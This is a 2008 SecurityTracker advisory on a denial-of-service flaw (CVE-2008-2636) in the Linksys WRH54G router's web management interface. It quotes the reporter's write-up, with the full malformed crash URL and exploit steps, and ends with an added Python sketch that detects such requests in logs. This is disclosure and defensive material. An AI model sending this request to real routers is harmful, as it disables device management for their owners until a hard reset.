SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   Linksys Router
Vendors:   Cisco
Linksys WRH54G Router Management Interface Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1020237
SecurityTracker URL:  http://securitytracker.com/id/1020237
CVE Reference:   CVE-2008-2636   (Links to External Site)
Updated:  Jul 17 2008
Original Entry Date:  Jun 11 2008
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Model WRH54G; firmware 1.01.03
Description:   A vulnerability was reported in the Linksys WRH54G Router. A remote user can cause denial of service conditions.

A remote user can send a specially crafted HTTP request to the management interface to cause the target service to crash. A hard reset is required to return the interface to normal operations.

Traffic processing through the device is not affected.

A demonstration exploit URL is provided:

http://[target]/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefron
t_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagef
ront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pa
gefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront
_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefro
nt_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page
front_page.asp

dubingyao at gmail dot com reported this vulnerability.

Impact:   A remote user can cause the management interface to hang.
Solution:   Some reports indicate that version 1.01.04 is not affected.

[Editor's note: The Cisco/Linksys documentation for driver version 1.01.04 does not mention this vulnerability.]

Vendor URL:  cisco.com/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  Remote DoS vulnerability in Linksys WRH54G

1. DESCRIPTION

There is a DoS vulnerability in the HTTP service of the Cisco Linksys WRH54G router. Any anonymous attacker could easily crash the HTTP service by sending a malformed HTTP request, and no privileges are needed.

When the device attempts to process the malformed request, it will be possible to corrupt sensitive memory. Although unconfirmed, it may also be possible to modify various configuration settings or execute malicious code.

After being attacked, the Cisco Linksys router can't be accessed remotely by any user. The HTTP service does not recover, and the attacked router cannot be managed without a hard reboot. Rebooting the router may cause a network disconnection.

Furthermore, the firewall can still route packets.

2. Affected products and versions

Affected products:
Cisco Linksys WRH54G and other devices
(Because I do not have enough other Linksys routers on hand, I can't be sure how many devices this vulnerability affects.)

Affected versions:
The latest firmware, v1.01.03

Privileges required:
No

3. ANALYSIS

A malformed HTTP request can cause the HTTP service to crash. The malformed request combines the string ./ with an excessive number of characters. Its format is as follows:
Http://192.168.1.1/./front_page......front_page.asp

4. EXPLOIT STEPS

4.1 Make sure the router is running normally and the web server is working correctly.

4.2 Open the explorer, type the following malformed URL, and press ENTER:
http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefron
t_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagef
ront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pa
gefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront
_p
 agefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefro
nt_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page
front_page.asp

4.3 Check the HTTP service; it no longer works.


Note:

1. The string ./ in the malformed request is necessary. Without this string, the HTTP server will ask the anonymous user to enter authentication information.

2. The string .asp at the end of the malformed request is also necessary. Without this string, we cannot crash the HTTP server.

3. The firmware information can be found at: http://www-cn.linksys.com/servlet/Satellite?childpagename=CN%2FLayout&packedargs=page%3D2%26cid%3D1140648553423%26c%3DL_Content_C1&pagename=Linksys%2FCommon%2FVisitorWrapper&SubmittedElement=Linksys%2FFormSubmit%2FProductDownloadSearch&sp_prodsku=1172713275887

4. There is another DoS vulnerability involving malformed HTTP requests in Linksys devices (http://www.securityfocus.com/bid/6301/info).
The description and exploit are different from this vulnerability.
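
The following detection sketch is an added example, not part of the advisory or the reporter's message. It flags requests that show all three traits described above (a ./ path segment, an overly long path, and a trailing .asp) and assumes that requests to the management interface are recorded in Common Log Format by a proxy or sensor in front of the device; the length threshold, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: 256 bytes is an illustrative ceiling for a management-UI path;
# the advisory gives no exact length at which the service fails.
MAX_PATH_LEN = 256

# Common Log Format: client, identd, user, [time], "METHOD target PROTO", ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*"')

def request_traits(target, max_path_len=MAX_PATH_LEN):
    """Return which of the advisory's three traits a request target shows."""
    # Decode %2e etc. first as a precaution (encoded forms are not in the advisory).
    path = unquote(urlsplit(target).path)
    traits = set()
    if "/./" in path:
        traits.add("dot-segment")    # note 1: without it the server prompts for auth
    if path.lower().endswith(".asp"):
        traits.add("asp-suffix")     # note 2: required for the crash
    if len(path) > max_path_len:
        traits.add("overlong-path")
    return traits

def suspect_clients(log_lines, max_path_len=MAX_PATH_LEN):
    """Map client address -> number of requests showing all three traits."""
    hits = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and len(request_traits(m.group(3), max_path_len)) == 3:
            hits[m.group(1)] = hits.get(m.group(1), 0) + 1
    return hits

# Constructed sample log (documentation-range addresses; the filler is arbitrary,
# only the path's shape matters to the check).
FILLER = "A" * 600
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jun/2008:10:00:00 +0000] "GET /index.asp HTTP/1.1" 401 0',
    '192.0.2.10 - - [11/Jun/2008:10:00:05 +0000] "GET /./index.asp HTTP/1.1" 200 512',
    '198.51.100.7 - - [11/Jun/2008:10:01:00 +0000] "GET /./' + FILLER + '.asp HTTP/1.1" - -',
    '198.51.100.7 - - [11/Jun/2008:10:01:02 +0000] "GET /%2e/' + FILLER + '.asp HTTP/1.1" - -',
    '203.0.113.5 - - [11/Jun/2008:10:02:00 +0000] "GET /' + FILLER + ' HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(suspect_clients(SAMPLE_LOG))
```

Requests that show only one or two traits, such as a short /./ path or a long path without .asp, are left unflagged so the rule stays tied to the request shape the advisory describes.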

 
 

